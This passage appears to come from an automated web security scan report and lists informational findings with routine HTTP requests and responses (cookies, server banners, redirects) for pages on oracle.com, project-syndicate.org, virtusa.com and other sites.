Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; __utmz=82970249.1298824276.1.1.utmgclid=CLqQ3K_hqKcCFc9w5QodUFfOCg|utmccn=(not%20set)|utmcmd=(not%20set); vertigo=false; s_cc=true; __utmv=; __utma=82970249.1334409241.1298824276.1298824276.1298824276.1; __utmc=82970249; __utmb=82970249.2.10.1298824276; s_sq=netsolglobal%3D%2526pid%253Dnet%25257C%252520domain-name-registration%25253Edomain-name-search-results.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.networksolutions.com%25252Fimg%25252Fbuttons%25252Fview-all-extensions.gif%2526ot%253DIMAGE; currency=USD

Response

HTTP/1.1 304 Not Modified
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:35:38 GMT
Cache-Control: private,max-age=3600
X-powered-by: Servlet/2.5
Date: Sun, 27 Feb 2011 16:35:37 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:35:38 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:35:38 GMT; Path=/


7.554. http://www.oracle.com/pls/www/go.lp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /pls/www/go.lp

Request

GET /pls/www/go.lp?kw=&Src=6804803&Act=40&pcode=WWMK09049794MPP029 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/go/index.html?&Src=6804803&Act=40&pcode=WWMK09049794MPP029
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 269
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 23:19:47 GMT
Connection: close
Set-Cookie: ORA_UID=WWW_45600899;expires=Sun, 26-Feb-2012 23:19:47 GMT

<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
<!--// v42 -->
<!--//
window.location.replace("http://eventreg.oracle.com/webapps/events/ns/EventsDetail.jsp?p_eventId=117156&src=6804803&src=6804803&Act=4
...[SNIP]...

7.555. http://www.project-syndicate.org/create_captcha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /create_captcha

Request

GET /create_captcha?id=3 HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=30dea60-12e64e877f0-4b740973-1; __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.1.10.1298773079; _bizo_cksm_crc32=3975EE35; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; _bizo_np_stats=221%3D1047%2C315%3D1403%2C; _chartbeat2=occw3y7oz7bpai8h

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: hash=SCjS%2FCSCg0XE.; path=/
Content-Type: png
Content-Length: 442
Date: Sun, 27 Feb 2011 02:18:26 GMT
X-Varnish: 311664540
Age: 0
Via: 1.1 varnish
Connection: keep-alive

.PNG
.
...IHDR.......2............    PLTE............W...lIDAT8..T1.. ....$R..I$.. ..6F._y@0......t..!..3... ....O.....\.......:'.N.cz6.....p.A..e.....Y.    ..0..M.".|).Z.V..0.0h.R.....).........o.y...
...[SNIP]...

7.556. http://www.stowetel.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stowetel.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.stowetel.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=deb210191741704d:TM=1298821939:LM=1298821939:S=kuvwCFTx1InBCpo7; expires=Tue, 26-Feb-2013 15:52:19 GMT; path=/; domain=domains.googlesyndication.com
X-Content-Type-Options: nosniff
Date: Sun, 27 Feb 2011 15:52:19 GMT
Server: domainserver
Content-Length: 11786
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html,b,i{color:#222}html{ba
...[SNIP]...

7.557. http://www.trafficshaping.com/_mint/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trafficshaping.com
Path:   /_mint/

Request

GET /_mint/?record&key=3233333478326e5341523861487a4c6a38445939643231&referer=&resource=http%3A//trafficshaping.com/&resource_title=TrafficShaping%20-%20The%20URL%20Shortener%20for%20Online%20Marketers&resource_title_encoded=0&1298824333714&serve_js HTTP/1.1
Host: www.trafficshaping.com
Proxy-Connection: keep-alive
Referer: http://trafficshaping.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; MintAcceptsCookies=1

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:13 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:32:14 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintUnique=1; expires=Wed, 24-Feb-2021 16:32:14 GMT; path=/; domain=.trafficshaping.com
Set-Cookie: MintUniqueHour=1298822400; expires=Sun, 27-Feb-2011 17:00:00 GMT; path=/; domain=.trafficshaping.com
Set-Cookie: MintUniqueDay=1298793600; expires=Mon, 28-Feb-2011 08:00:00 GMT; path=/; domain=.trafficshaping.com
Set-Cookie: MintUniqueWeek=1298793600; expires=Sun, 06-Mar-2011 08:00:00 GMT; path=/; domain=.trafficshaping.com
Set-Cookie: MintUniqueMonth=1296547200; expires=Fri, 04-Mar-2011 08:00:00 GMT; path=/; domain=.trafficshaping.com
Content-Length: 10
Content-Type: text/javascript

/*Minted*/

7.558. http://www.virtusa.com/aboutus/advisory-board.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /aboutus/advisory-board.asp

Request

GET /aboutus/advisory-board.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27406
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.559. http://www.virtusa.com/aboutus/awards-and-certifications.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /aboutus/awards-and-certifications.asp

Request

GET /aboutus/awards-and-certifications.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23387
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.560. http://www.virtusa.com/aboutus/company-overview.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /aboutus/company-overview.asp

Request

GET /aboutus/company-overview.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20046
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.561. http://www.virtusa.com/aboutus/management-board.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /aboutus/management-board.asp

Request

GET /aboutus/management-board.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30173
Content-Type: text/html; Charset=ISO-8859-1
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.562. http://www.virtusa.com/aboutus/our-offices.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /aboutus/our-offices.asp

Request

GET /aboutus/our-offices.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31222
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.563. http://www.virtusa.com/aboutus/why-virtusa.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /aboutus/why-virtusa.asp

Request

GET /aboutus/why-virtusa.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24330
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.564. http://www.virtusa.com/applications/userlogin/freedownload.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /applications/userlogin/freedownload.asp

Request

GET /applications/userlogin/freedownload.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Location: /applications/download/getfile.asp?fn=
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:59:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:59:19 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/applications/download/getfile.asp?fn=">here</a>.</body>

7.565. http://www.virtusa.com/btrc/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /btrc/default.asp

Request

GET /btrc/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9486
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.566. http://www.virtusa.com/careers/campus-reach-initiative.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /careers/campus-reach-initiative.asp

Request

GET /careers/campus-reach-initiative.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25390
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.567. http://www.virtusa.com/careers/open-positions.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /careers/open-positions.asp

Request

GET /careers/open-positions.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28509
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.568. http://www.virtusa.com/careers/our-values.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /careers/our-values.asp

Request

GET /careers/our-values.asp HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Referer: http://www.virtusa.com/practices/software-testing/tools-expertise.asp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utmb=213023891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:32:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:32:56 GMT
Content-Length: 27695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.569. http://www.virtusa.com/careers/why-virtusa.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /careers/why-virtusa.asp

Request

GET /careers/why-virtusa.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25768
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.570. http://www.virtusa.com/careers/work-environment.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /careers/work-environment.asp

Request

GET /careers/work-environment.asp HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Referer: http://www.virtusa.com/careers/our-values.asp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utmb=213023891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:33:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:33:46 GMT
Content-Length: 30611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.571. http://www.virtusa.com/clients/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /clients/

Request

GET /clients/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27826
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.572. http://www.virtusa.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /contactus/

Request

GET /contactus/ HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Referer: http://www.virtusa.com/practices/dwbi/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utmb=213023891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:32:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:32:05 GMT
Content-Length: 34586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...

7.573. http://www.virtusa.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /default.asp

Request

GET /default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25792
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:03:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:03:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
